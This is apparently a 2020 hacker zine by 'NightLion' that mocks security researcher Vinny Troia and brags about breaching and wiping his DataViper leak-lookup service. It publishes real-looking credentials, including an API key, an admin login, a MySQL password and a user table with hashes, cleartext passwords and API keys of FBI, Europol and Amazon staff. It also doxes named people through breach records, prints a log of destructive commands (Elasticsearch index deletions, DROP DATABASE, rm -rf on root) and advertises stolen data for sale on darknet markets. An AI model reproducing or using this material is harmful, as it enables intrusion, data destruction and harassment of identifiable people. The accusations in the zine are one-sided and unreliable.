Title:Vinny Troia Zine
Created:Jul 17th, 2020
Created by: Anonymous
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 _________________________ ( ____ )\__ __/( ____ ) | ( )| ) ( | ( )| | (____)| | | | (____)| | __) | | | _____) | (\ ( | | | ( | ) \ \_____) (___| ) |/ \__/\_______/|/ _________ _ _ |\ /|\__ __/( ( /|( ( /||\ /| | ) ( | ) ( | \ ( || \ ( |( \ / ) | | | | | | | \ | || \ | | \ (_) / ( ( ) ) | | | (\ \) || (\ \) | \ / \ \_/ / | | | | \ || | \ | ) ( \ / ___) (___| ) \ || ) \ | | | \_/ \_______/|/ )_)|/ )_) \_/ _________ _______ _______ _________ _______ \__ __/( ____ )( ___ )\__ __/( ___ ) ) ( | ( )|| ( ) | ) ( | ( ) | | | | (____)|| | | | | | | (___) | | | | __)| | | | | | | ___ | __ | | | (\ ( | | | | | | | ( ) | {OO} | | | ) \ \__| (___) |___) (___| ) ( | \__/ )_( |/ \__/(_______)\_______/|/ \| |^| h3h3 dataviper geddit? /\ | |_________________________________________________________________________/ / \____________________________________________________________________________/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Who is Vinny Troia? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "You like bad techno, doxing children, trading stolen data, Supreme merch, and hair gel . You can't investigate, you can't hack, and you don't know how to root the gibson . Face it, you're never gonna make it ." ---- Vinny Troia is what I would call a security charlatan [1] . He calls himself an "ethical hacker" and an "investigator" but doesn't have the skills to back it up . He says he has a PhD but its from some shitty online university called Capella University . His hacking knowledge doesn't extend beyond basic "OSINT" which is skid hacker 101 stuff . Even then his OSINT leads him to hilariously wrong conclusions as you can read in his "TDO investigation report" from this leak . You can also read "Hunting Cyber Criminals" if you don't have a HackForums account to read doxing tutorials . 
In order to make himself out to be something he's not he latches onto other security researchers (and even criminal hackers) to give himself credibility . He used Bob Diachenko during the Elasticsearch breaches to make it seem like he has some technical knowhow but it's obvious that Bob did all the heavy lifting for those . He took advantage of Nclay's mental instability in order to promote himself and his business . Vinny seems to think that he's doing some form of "undercover" work like he's a "secret agent" but he is not a member of law enforcement and is often working with the criminals he claims to be against . This has been his pattern of behaviour since he became involved in the blackhat communities in 2017 under the pseudonym "soundcard" where he was actively selling stolen data on the forum KickAss [2] . Let's not forget that even earlier in his career his services involved paying ransoms to hackers (such as TDO) for companies in the event of a breach [3] . He should have stuck with making bad techno music [4] . [1] http://attrition.org/errata/charlatan/ [2] https://krebsonsecurity.com/2018/10/when-security-researchers-pose-as-cybercrooks-who-can-tell-the-difference/ [3] https://www.coindesk.com/coinbase-white-hat-hacker-dont-want-bitcoin/ [4] https://open.spotify.com/artist/1kFtnXoymZXUQv5K7T6GSN ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ What is DataViper? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ DataViper is a data lookup site much like WeLeakInfo, LeakedSource and the others that came before it . For some reason Vinny thinks he's above the law here given that the aforementioned sites have all been shutdown or seized by Law Enforcement . 
He will claim that he only gives access to organizations and LE but if you look through the data he gave access to DDB ( a member of GnosticPlayers [1] ) for several months ( August 27th 2019 to March 4th 2020 )[2] during which time DDB hacked many more sites [3] . I suspect as part of this relationship Vinny would get the data that DDB hacked in return which would make him complicit in DDB's activities . If you go through the release list he has most if not all the Gnosticplayers data as a result of his special relationship with them . Unfortunately the DDB account was deleted before I compromised DataViper and its search history erased so those logs are not available but it's easy to imagine how useful this lookup would be to the ShinyHunters/Gnosticplayers group as they mainly target developer Github accounts with password reuse . He also gave access to other people from RaidForums and to the WeLeakInfo admin [4] . [1] https://www.dataviper.io/blog/2019/gnosticplayers-part-1-nclay-ddb-nsfw/ [2] If you look in the DataViper production DB in the user_activity table for references to DDB you can see that Vinny's account makes a lot of updates to the profile details of DDB beginning in August 2019 and ending in March 2020 when he deletes the DDB account . [3] https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/ [4] Look for moot@raid.lol and admin@weleakinfo.com in the user_activity table . 
⠀⠀⠀⠀⣠⣦⣤⣀ ⠀⠀⠀⠀⢡⣤⣿⣿ ⠀⠀⠀⠀â ⠜⢾⡟ ⠀⠀⠀⠀⠀⠹⠿⠃⠄ ⠀⠀⠈⠀⠉⠉⠑⠀⠀â ⢈⣆ ⠀⠀⣄⠀⠀⠀⠀⠀⢶⣷⠃⢵ â ⠰⣷⠀⠀⠀⠀⢀⢟⣽⣆⠀⢃ ⠰⣾⣶⣤⡼⢳⣦⣤⣴⣾⣿⣿⠞ ⠀⠈⠉⠉⠛⠛⠉⠉⠉⠙â ⠀⠀â¡â ˜â£¿â£¿â£¯â ¿â ›â£¿â¡„ ⠀⠀â ⢀⣄⣄⣠⡥⠔⣻⡇ ⠀⠀⠀⠘⣛⣿⣟⣖â¢â£¿â¡‡ ⠀⠀⢀⣿⣿⣿⣿⣷⣿⣽⡇ ⠀⠀⢸⣿⣿⣿⡇⣿⣿⣿⣇ ⠀⠀⠀⢹⣿⣿⡀⠸⣿⣿⡠⠀⠀⠀⢸⣿⣿⠇⠀⣿⣿⣿ ⠀⠀⠀⠈⣿⣿⠀⠀⢸⣿⡿ ⠀⠀⠀⠀⣿⣿⠀⠀⢀⣿⡇ ⠀⣠⣴⣿⡿⠟⠀⠀⢸⣿⣷ ⠀⠉⠉â ⠀⠀⠀⠀⢸⣿⣿â ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Elasticsearch "breaches" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ There have been multiple "breaches" that Vinny has reported on where it seems like he is the only person outside the affected company who has the data . For example, I have seen no evidence of Verifications.io or Apollo.io breaches being in the hands of others . It is unethical in this situation to find these exposed databases and harvest the data as a supposed security researcher and then go on to include that data in a database lookup service . This hoser is literally finding a vulnerability, exploiting that vulnerability by extracting the data and then selling access to that data to others . There is not a bug bounty program in existence that would allow you to dump all their data after finding a vulnerability without pressing charges . I don't know how he justifies leaking that data to get credit on hacking forums either: https://raidforums.com/Thread-Verifications-io-200m-Happy-Holidays I guess DataViper was just another unsecured Elasticsearch instance . 15 billion records leaked by incompetent security company, how is that for a headline? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vinny's Hacking Aliases ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ It has been speculated that the threat actor "Exabyte" was Vinny although there has been no formal evidence to back up these claims . Until now . After some real investigation ( not the Vinny kind ) I was able to identify that Exabyte shared an IP Address with a "Jessica Troia" [1][2] . 
As you can see below, Jessica Troia and Exabyte either happened to be connected to the same Starbucks wifi or Exabyte and Jessica Troia live in the same household, I know which I believe to be more likely . The fact that he is Exabyte is notable as this user has traded and sold data on RaidForums as you can see from their posts and their reputation [3] . As mentioned in the previous section Vinny also leaked data under this alias that only he had access to [4] ! To further corroborate this link between Exabyte and Vinny I found two accounts registered from that same IP address on two different hacking forums with the name "nightlion" and email "thenightlion@protonmail.com" [5][6] . "NightLion Security" is the name of Vinny's security company . Bishop99 is another one of his aliases on RaidForums [7] . I know Bishop is Vinny because he promotes DataViper on this account [8], got annoyed with people who were leaking his book [9][10] and also pretty much admitted it [11] . Some adventures he had on this account include trying to fundraise 24k$ to buy hacked Instagram data [12], asked for advice on setting up a database lookup ( which would become DataViper ) [13] and getting scammed multiple times attempting to purchase data [14][15] . He also leaked some databases under this alias as well . For fun I did some searches on DataViper and found that Vinny also recently signed up to maza.la and lcp.cc with the username "Sandman" [16] . 
[1] OGUsers.com, Breach Date: April 2020 User ID: 158805 Username: Exabyte Email Address: exabyt3@pm.me Registration IP Address: 47.34.65.210 Last Login IP Address: 145.239.207.11 MyBB Hash: c1502a4eac4e7df9d68969d362af787d MyBB Salt: JHVp5fgy [2] Houzz.com, Breach Date: March 2019 Username: jesstroia Email Address: jessicatroia@gmail.com IP Address: 47.34.65.210 SHA512Crypt Hash: \_\_SEC\_\_01R5fAC6cZwkKaYVwBz5Z5G/UC.yY7FA0pGFzz3ESaAmSm6G1BBAZmbaf39cMK8/ofzkgbluUhqvmD1S7Mn3RSaHkkYSuRgq88e3Uxf1 [3] https://raidforums.com/reputation.php?uid=121666013 [4] https://raidforums.com/Thread-Verifications-io-200m-Happy-Holidays [5] DemonForums.com, Breach Date: February 2019 User ID: 32035 Username: nightlion Email Address: thenightlion@protonmail.com Registration IP Address: 47.34.65.210 Last Login IP Address: 47.34.65.210 MyBB Hash: bcf7ad0393b506065a329b97e6dec53e MyBB Salt: A4ZponkV [6] OGUsers.com, Breach Date: April 2020 User ID: 22916 Username: nightlion Email Address: thenightlion@protonmail.com Registration IP Address: 47.34.65.210 Last Login IP Address: 110.44.115.176 MyBB Hash: f1983818f063bd31d167127d7ad2d729 MyBB Salt: yIvVYOWf [7] https://raidforums.com/User-Bishop99 [8] https://raidforums.com/Thread-NSFW-the-ruthless-piece-of-shit--80380?pid=1438543 [9] https://raidforums.com/Thread-Hunting-Cyber-Criminals-Vinny-Troia-Leaked?pid=1526177 [10] https://raidforums.com/Thread-Hunting-Cyber-Criminals-Vinny-Troia-FULL-BOOK?pid=1684264 [11] https://raidforums.com/Thread-BitMax-Crypto-DB-Exchange-Cracked-Dumped-By-AmIEdgyEnough?pid=1162299 [12] https://raidforums.com/Thread-Full-DOXAGRAM-Data-6-million-top-Instagram-accts-only-200 [13] https://raidforums.com/Thread-Importing-all-these-dumps-into-a-database [14] https://raidforums.com/Thread-BANNED-Scam-Report-BigLadBigDog-aka-Silox-260 [15] https://raidforums.com/Thread-RESOLVED-Scam-Report-against-CrimeAgency-500--34765 [16] { "_index" : "dvf-001", "_source" : { "forum" : "maza.la", "pid" : "78019", "subject" : 
"Newcomer: Sandman", "author" : "support", "message" : "ник: Sandman профили на других площадках: raidforums.com/User-Exabyte lcp.cc - sandman verified - exabyte Вид деÑтельноÑти - Продажа-покупка хакнутых баз.", "date" : "1583557200.0" } } Translation: "nickname: Sandman profiles on other sites: raidforums.com/User-Exabyte lcp.cc - sandman verified - exabyte Kind of activity - Sale-purchase of hacked bases" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The DataViper Hack ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Don't piss off hackers" - @VinnyTroia , December 2017 https://twitter.com/vinnytroia/status/943478765962842112 ---- You might be wondering how DataViper was hacked [1] . At the present moment I still have access to the DataViper servers and I think I will have access to them for the foreseeable future so I will not be revealing the entry points in this zine (but if you spot it in the source feel free to exploit it yourself) . Just for a taste though you can look at the API docs [2] and scroll to the very bottom where you can get a free API key ( KDWkI01TERFzFKYNYwKIjh1vXmCv1g9Z0fcCLEzgg4oA9aNZQLHfjaXlqZ3bqkonMcI3Zm7vWLVNs7UqWnBT7XGxBDaea02ozkIU ) and an admin login ( dvdevops : Data$Pank1t@38 ) . I may release more details in a follow-up zine if circumstances change . Access has been maintained for over 3 months and hundreds of GB of data was exfiltrated without anyone noticing, even when he had to pay more money to DigitalOcean for more bandwidth . Great endpoint protection you got there . Let's check out the user table . 
+------------------------------------------+------------------------------------+--------------------------------------------------------------+----------------+------------+-----------------+--------------------+------------------------------------------------------------------------------------------------------+ | email | username | password | clear_password | first_name | last_name | company | api_key | +------------------------------------------+------------------------------------+--------------------------------------------------------------+----------------+------------+-----------------+--------------------+------------------------------------------------------------------------------------------------------+ | vinny@nightlionsecurity.com | dvadmin | $2y$10$mri/Q94sKcYcIiFpgRka0uX2rNzyrEfFuuQIJd3fv9saPa/buw.qW | | DV | Admin | | KfMWXrsoAQMwDa3NalhfApUrF3SkDSJFCOHm4ai1g6W3Ntoew5yWS6vzXfOnXcYY7lj6i9UXuQ1ymfUTxe0ER6tQxHK4edmcscMt | | dev@dataviper.io | dvdevops | $2y$10$R16iIOVntzLK2XIt4ywTOOGguvOnw3qkkusNveRusa5S3fx9eRMGC | | | | | | | bob@securitydiscovery.com | bob@securitydiscovery.com | $2y$10$CMyLR32HQyoJsjN54pubVO5muj7lnVVbdEVkGKAHkr4DWILpxeoc6 | BobV1p3rTmp001 | Bob | D | Security Discovery | | | dharmeshbokadiya@knovator.in | Knovator | $2y$10$6HMfRPvA1GPemqJMrQpV3.WpXUgbfWTsNajVFxasboHBhri1RwzW. | | Knovator | Knovator | | | | mvanderbunt@fbi.gov | mvanderbunt@fbi.gov | $2y$10$3ktEYHx6Rqn5t7i1hR3MRuGzl5qTluuFiDuY.Dq0leH4iql3MCoUK | | Marla | Vanderbunt | FBI | | | jcran@intrigue.io | jcran@intrigue.io | $2y$10$470CcHy46M7iTlZTzA9aiOCelh2MoXKO9oJUMwPC0cMMHZTRjLdDu | | Jonathan | Cran | | | | jedecapua@fbi.gov | jedecapua@fbi.gov | $2y$10$/L6DZ8NENey7FWEaViQ32ObMnzv.LcMSU8tO0.3lI9VYOCcmRAd0a | | Joel | Decapua | FBI | | | Alexander.Gutwin@europol.europa.eu | Alexander.Gutwin@europol.europa.eu | $2y$10$lzSfJ.xWbFFjqFHGVqMMuOKnjO6azjY1jgJ4MwGpfH2P72kVkMic. 
| | Alexander | Gutwin | Europol | | | Catarina.Nunes-Ladeira@europol.europa.eu | ep-cnl | $2y$10$/JFLHJw9OpSjeS4pedchaOXAb2gOxm5tBlQSc0KzZ/dW9TSr1mmFG | | Catarina | Nunes | Europol | UgUC8bc5DoNM7ZfQpq5vzR9rKCzryPYGpig8QvOKLdXVZvgBVUxbAmDLzWuKcwLkJz1GmSyHWxxpNXoSXpovkXIG2M93E5CRotVh | | spfarr@amazon.com | spfarr@amazon.com | $2y$10$hL1dBQfClA5hyXtk4aZGGOo2baHKb0iGfDWWy4lxmpj4bd/Nqgiki | | Amazon | Trial1 | Amazon | eCaU1XRT8XHEcoOzBt972p1GGN2nrqCJPyVbsnpAaFSBZJ3SdzNVUuMswSrqRC4OtCkf0AhE9ROhZca2IqaPzj9xjtiu45oZ2guG | | acflorin@amazon.com | acflorin@amazon.com | $2y$10$TVmeCUUXsSQIHErepdpule1apQoDqwNXrPj0gS0b64Qj5kcGK2kxO | | Alexandru | Florin-cristian | Amazon | R6UNy4dneojFH9y9S4tNFyk41XIoMz8zrVtU10jcSyzwJmbFj3UX37osh3YkFsEQzQRteeCUv7l1tr97JcLJ55bVesfrPQjDN4mU | | heathcoa@amazon.com | heathcoa@amazon.com | $2y$10$xmZtij5LJdzkFnjLXXK9FubJtifYBUd9Eb76kbBHjii64IjSqlSAm | | Aric | Heathcoat | Amazon | XzxcdMyJ9Me6qz7nIMxdxMbkvwkS5XlqqmiprCdLu3KnEbpXYORi9wkTiXC7hnhgStBMMA6K2QyFTvkKE9GuC3HBB9FEBz4wxFDf | | gdorton@amazon.com | gdorton@amazon.com | $2y$10$yQCIM2iV3GBQojaUIgjeVeSEFBdblDUMnQAZm3ZghVqhgcbIgHYHm | | Glen | Dorton | Amazon | LpIyRXBnsxFLXjduhDzjbziI6vzt1eVX9s7VI3wrK5uMeOFiW1Ve7VVWFUH0UN1WqyEqmtc2i8oKywG0ehYoigorWKvLm5T6AdNU | | vonjason@amazon.com | vonjason@amazon.com | $2y$10$.qwMBZw1gNd1E2x7ajF5Su3z03J98grsuqmEGfmv17gMkonuOYD6W | | Jason | VonBargen | Amazon | V37Lyx0qXe2id8H4msZB5nW5EjIKHlo5mCY20YHlMgGbyFh7epPOCiTvmaNGyYoLeShWpWmBLZpLNLwUbSxoTVeZOjgzusCB7OxP | | dgilich@amazon.com | dgilich@amazon.com | $2y$10$vImGAsjh4laLTmHvZgfJLOGjkBNC1uJGd1X3Jaa5pLpIOVvR/aX9C | V1p3i_72hChair | Denny | Gilich | Amazon | NUrCKMCWOzC512KI7VpKt1j6GeqEQDGVUov3iS5JHyMzHbjIHghZUWX54qV0unjWK2A20RJi5qXevxA8BQJ6FlJ1O9GP3HxmpJwj | | psarosh@amazon.com | psarosh@amazon.com | $2y$10$5tVKpxNDFHX0nyydRuLFWOkTiKDj2MFbcLMcEaLe2Udk4oO13DA0G | V1p3i_72hChair | Sarosh | Petkar | Amazon | 
VaIro3Xu1egP6SqTZj1tQR2xF7DublIE1sweDCyygYBbAUsS8pAGLxFOAnzzFfez904OadG7gFroCGfmWpeVxGJgJpTfU2im9ETC | | aalmarri@dubaipolice.gov.ae | aalmarri@dubaipolice.gov.ae | $2y$10$aeU2J3gxUYaDu6XlmRw52.u1tjGvKEbhpR0m5723CyJd9kMZZFwFq | | A | Almarri | Dubai Piolice | J1xEc4sMOzOT8kUNraWbbUAXjyfUIU2kugxuzrcOxinCInP8calWIec3l8r3B1lCvXCCS4wp1jAIDa5QDVedrWDgbKNqbVuGehrl | | k.alhosani@dubaipolice.gov.ae | k.alhosani@dubaipolice.gov.ae | $2y$10$CZG9zN34Bu5Qscb/XIww7ef3ww2YrBlD2IVsDr7ZycWM9E7.LROM. | | Khalil | Hosani | Dubai Police | Xk85hkSbN2X8EF0dMobBehbudxPiMgdUzXyYZQZ8XnK6uspSTmy4kLkFAEk4YUeNbSkfDbu0wILhWueayOlsRCF4Ur6ehCzE4uxL | | swamsley@protonmail.com | swamsley@protonmail.com | $2y$10$Y.gXhSnME8xyIKUhcXlfgOQBp8KNd9YpFce6Eol8qpW/40vKJOhyO | | Steve | Wamsley | Data VIper | vXI3bXqdR8IxunpcZ3FAXKMQVrpoIaRbaE3FB35zB9TZyH6ELaoNQzepHtJTgAEGMRpsYxaXUpCEOvJn3O0Ect44v5pobtGnMpjZ | | scraper@dataviper.io | scraper | $2y$10$cPJcysp4t9ag2rLdpspyg.kois9auHNpGAIlrPToq3PVK/5X5mCP6 | | Scraper | User | Data Viper | JTlig7BrLyKfJYN3XJuK8NyfroQALGlvsuc37QU0ijsq6EKQJxIbP0aoMEEe2AzlnZCFRs1xegC1rlvEu52i3yX7tF7hUFmNjasw | | aheid@securityscorecard.io | aheid@securityscorecard.io | $2y$10$pohlZEeWKg6hQq5k0XCKqeVJOnamL0Uo13d6/WJtIvJIqlH58FxLC | | Alex | Heid | SSC | 5UMzgfpPa2J0Ni7sS1sWaazLd63LxgTBBMlhLk4cVE1toyFrfRyhUlartcleXYuJF8EPXUSPTpjejN70h2bAnmjb38iRPDIiBkdJ | | provider.zestgeek@gmail.com | provider.zestgeek@gmail.com | $2y$10$clwQSjE6JgjiAK85fU4l2ePujBQLyBaqylnLIVEei0XxytqWwsx8W | | Zestgeek | Developer | Zestgeek | N8njywhkhBzOG5C2XqzDzy7txYRCpVc0dw7sxnfxOeMfH2jVRTaxUOvTMjejxHZ9p7DR0ebpFWyrBDQvKzaA35flsXsQUxN6oiSe | | sp@nightlionsecurity.com | sp@nightlionsecurity.com | $2y$10$kAaOKWJKZ5jUN.t71Nd5MeaSIKb0Ycfz/53HDV9EwQcEXTUXL/F3S | | Shweta | Patel | Night Lion | g9ub4uDFYSGbkRqz3IMIjyl6hv0oYsqlG5OIrt4fOV6faffHKhwIterTVU6wttJyyKIQirv0HkO5KhMo6uBbu8jNealRnKWHPXXb | 
+------------------------------------------+------------------------------------+--------------------------------------------------------------+----------------+------------+-----------------+--------------------+------------------------------------------------------------------------------------------------------+ Look at that handy clear_password column ! #secure Only two users changed passwords during the timespan of the breach . +------------------------------------------+------------------------------------+--------------------------------------------------------------+------------+------------+ | email | username | password | first_name | last_name | +------------------------------------------+------------------------------------+--------------------------------------------------------------+------------+------------+ | jedecapua@fbi.gov | jedecapua@fbi.gov | $2y$10$qloFWkJcrcTn75EgswavTuB5SGxcamiZJiRllWFQL2uMdNeSvKUwW | Joel | Decapua | | Catarina.Nunes-Ladeira@europol.europa.eu | ep-cnl | $2y$10$PxdkXxa7lkkFaEwKOLt5D.51qlbfXGMgv1F/sxFOHeEqouFHEMRJy | Catarina | Nunes | +------------------------------------------+------------------------------------+--------------------------------------------------------------+------------+------------+ They also recorded the searches in their DB so you check out the SQL if you're interested in that . [1] https://app.dataviper.io/proof.txt ( https://web.archive.org/web/20200709132020/https://app.dataviper.io/proof.txt ) [2] https://apidocs.dataviper.io/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Analysis of "Investigation Report" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ On the DataViper server I got a copy of the "Investigation Report" that Vinny has been working on . Please note that the copy in this leak is from December 2019 and may not be exactly the same as what he intends to release but I imagine it's very similar . 
I am not going to do a full review of it as it is genuinely a disorganized mess but I'll bring up some points here . At many points he fails to substantiate his claims or the links between aliases . Page 13: "it was revealed that all communication was run through a PHP-based translator." What does he mean here? The chat log immediately after doesn't show this and later he claims all TDO members are first-language English speakers anyway . Page 29: "This threat actor likes to create confusion and deception by stealing the handles of known hackers." And Vinny takes it hook, line, and sinker and just believes they're all the same person . He consciously knows this and yet released this ridiculous report ! Take note that he will also use this line of thinking to dismiss any evidence to the contrary of his theory at multiple points in his "report" . Page 42 Vinny thinks ROR[RG] and F3ttywap are shared aliases when they're not . It is extremely unlikely any of these actors share aliases other than the over-arching labels e.g. TDO . I find it really hilarious that Vinny thinks Peace of Mind is somehow this 19 year old kid from Calgary . I know that Peace of Mind didn't hack the sites he sold but still, they were mainly from 2012 . He was at least in contact with those who did . This Christopher kid would have been 11 or 12 years old at the time . Do you really think he would have had contact with the same people? Another thing to mention, why are you leaking this kid's phone number? What purpose does that serve to the public? How sure are you that this kid is who you say he is? Again this reads more like a skiddy dox than a professional report . Vinny thinks NSA (Christopher Meunier) and Cyper are different people but are also the same . Again just more confusion in this report . Page 67 ignores the fact that KickAss had coding challenges in place for new members which is probably where these code samples originate . 
They are also small simple code samples which means code stylometry will be a lot less accurate on them . Leave the cybercrime investigations to the FBI kid . If you want to read a proper OSINT report I would recommend either Bellingcat [1] or RecordedFuture [2] . They do a much better job . [1] https://www.bellingcat.com/category/resources/case-studies/ [2] https://www.recordedfuture.com/tessa88-identity-revealed/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Other data breaches ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ DataViper contained several undisclosed breaches . MGM Grand Hotels is included in the dataset with 142 million entries and was imported by Vinny on November 30th 2019 . This number is very different to the 10.7 million number that they stated were affected [1] . This indicates that MGM knowingly misreported information regarding this data breach and that Vinny is aware of this misrepresentation . FiveStars is another data breach that is in DataViper but not publicly disclosed . It was imported in November 2019 . It is unclear where it was reported to them and they failed to notify their users or if Vinny did not notify FiveStars . The same is true of Zumiez.com (160 million), Avito.ru (30 million), Mamba.ru (13 million), MyVestige.com (11 million), LocateFamily.com (11 million), and others . 
[1] https://www.zdnet.com/article/exclusive-details-of-10-6-million-of-mgm-hotel-guests-posted-on-a-hacking-forum/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Destruction ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ root@app:~$ curl -X DELETE "http://node1:9200/dvf-001" {"acknowledged":true} root@app:~$ curl -X DELETE "http://node1:9200/dvp-001" {"acknowledged":true} root@app:~$ curl -X DELETE "http://node1:9200/dvp-002" {"acknowledged":true} root@app:~$ curl -X DELETE "http://node1:9200/dvp-003" {"acknowledged":true} root@app:~$ curl -X DELETE "http://node1:9200/.elastichq" {"acknowledged":true} root@app:~$ curl -X DELETE "http://node1:9200/dv-n208" {"acknowledged":true} root@app:~$ curl -X DELETE "http://node1:9200/dv-n207" {"acknowledged":true} root@app:~$ curl -X DELETE "http://node1:9200/dv-n206" {"acknowledged":true} root@app:~$ curl -X DELETE "http://node1:9200/dv-n205" {"acknowledged":true} root@app:~$ curl -X DELETE "http://node1:9200/dv-n204" {"acknowledged":true} root@app:~$ curl -X DELETE "http://node1:9200/dv-n203" {"acknowledged":true} root@app:~$ curl -X DELETE "http://node1:9200/.kibana_task_manager_1 {"acknowledged":true} root@app:~$ curl -X DELETE "http://node1:9200/dv-n103" {"acknowledged":true} root@app:~$ curl -X DELETE "http://node1:9200/dv-n202" {"acknowledged":true} root@app:~$ curl -X DELETE "http://node1:9200/dv-n201" {"acknowledged":true} root@app:~$ curl -X DELETE "http://node1:9200/dv-n102" {"acknowledged":true} root@app:~$ curl -X DELETE "http://node1:9200/dv-dev" on"cknowledged":true} root@app:~$ curl -X DELETE "http://node1:9200/.apm-agent-configurati {"acknowledged":true} root@app:~$ curl -X DELETE "http://node1:9200/dv-n101" {"acknowledged":true} root@app:~$ curl -X DELETE "http://node1:9200/.kibana_2" {"acknowledged":true} root@app:~$ curl -X DELETE "http://node1:9200/.kibana_1" {"acknowledged":true} root@app:~$ curl -X DELETE "http://node1:9200/.kibana_3" 
{"acknowledged":true} root@app:~$ curl -X DELETE "http://node1:9200/.tasks" {"acknowledged":true} root@app:~$ curl -X DELETE "http://node1:9200/dv-i002" {"acknowledged":true} root@app:~$ curl -X DELETE "http://node1:9200/paste-001" {"acknowledged":true} root@app:~$ curl -X DELETE "http://node1:9200/dv-i001" {"acknowledged":true} root@app:~$ curl -X DELETE "http://node1:9200/dev-forums" {"acknowledged":true} root@app:~$ curl -X DELETE "http://node1:9200/reindexed-v7-dataviper {"acknowledged":true} root@app:~$ curl 51.79.99.83:9200/_cat/indices?v health status index uuid pri rep docs.count docs.deleted store.size pri.store.size root@app:~$ mysql -u viperwebadmin -pVipSQL00dh8yo -e "DROP DATABASE viperdev;DROP DATABASE viperusers;DROP DATABASE viperwp; DROP DATABASE mysql;" root@app:~$ cd / root@app:/$ rm -rf --no-preserve-root * 2>&1 root@app:/$ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Conclusions ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Well I hope you all enjoyed this read, it's been a while since we've had a good zine, eh ? I wonder if Vinny will notify all 15 billion victims of this data breach . I have attached my PGP key and signed this document with it . You can use this key to verify any future releases or whether you are talking to me or some scammer/security charlatan . If you wish to send me interesting things for a follow-up zine ( chat logs, BTC transactions, etc ) you can email me at nightlionleak@protonmail.com . Include a PGP key if you want a response . I am selling a lot of the data from DataViper's servers on Empire Market . 
You can visit my profile here to purchase the data: http://erj7kwqkdkl73ewsuq6stztehx2tehk2aidxlex3btrfnjqax3ucvgyd.onion/u/NightLion I am also leaking DataVipers source, DB and some other data here: http://fuvinnyziawisxgaetgrchidifxk377jdkqj56baqfsxbwkjmg24oeqd.onion See you around, NightLion ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ gr33tz to H0N0, RiskyBiz, Ac1dB1tch3z, floorgang, HQS, Brian "The Krebinator" Krebs, el8, HTP, the Akina Speedstars, RaidForums, fridge botnet owners, SleeperS Crew, Lulzsec, Phineas Fisher, Troy Hunt FUCK VINNY TROIA FUCK THE FEDERAL RESERVE #BLACKLIVESMATTER #FREEPALESTINE #HUNTINGCYBERCRIMINALS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ My PGP Key ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - -----BEGIN PGP PUBLIC KEY BLOCK----- mQENBF8Fwj8BCACwnWjExk4QcGUDh4EAAi/WfClfhracN4oO+74k6e2LLSjewk8V 3cJGnChyj87kmLx+vLI2hWBdnd3Dpul5HKWorcLg6ajkY/eOhEhccTCN7lWvyP2W QSyyz+0nwAyms5ojpPFAt3CeSPHBVMh9ThwmzeQq2u3U8Aku9M6rfVlJn3nRArnZ qrhPcG02NX2xDJcMIfSbLR57upG4+uJB+oaDfEJlPkKe3L5WWnpa1sHsTUDFuhgk RgXrFZyYDDk5pbR80OEQm7cjTZerpRiyk/NV4zMrDeRki+K+thUWat0giVrlv4zy xQNNrGNb23SNLJNYQAoXLDGBTrTDzV8EnpGpABEBAAG0KE5pZ2h0TGlvbiA8bmln 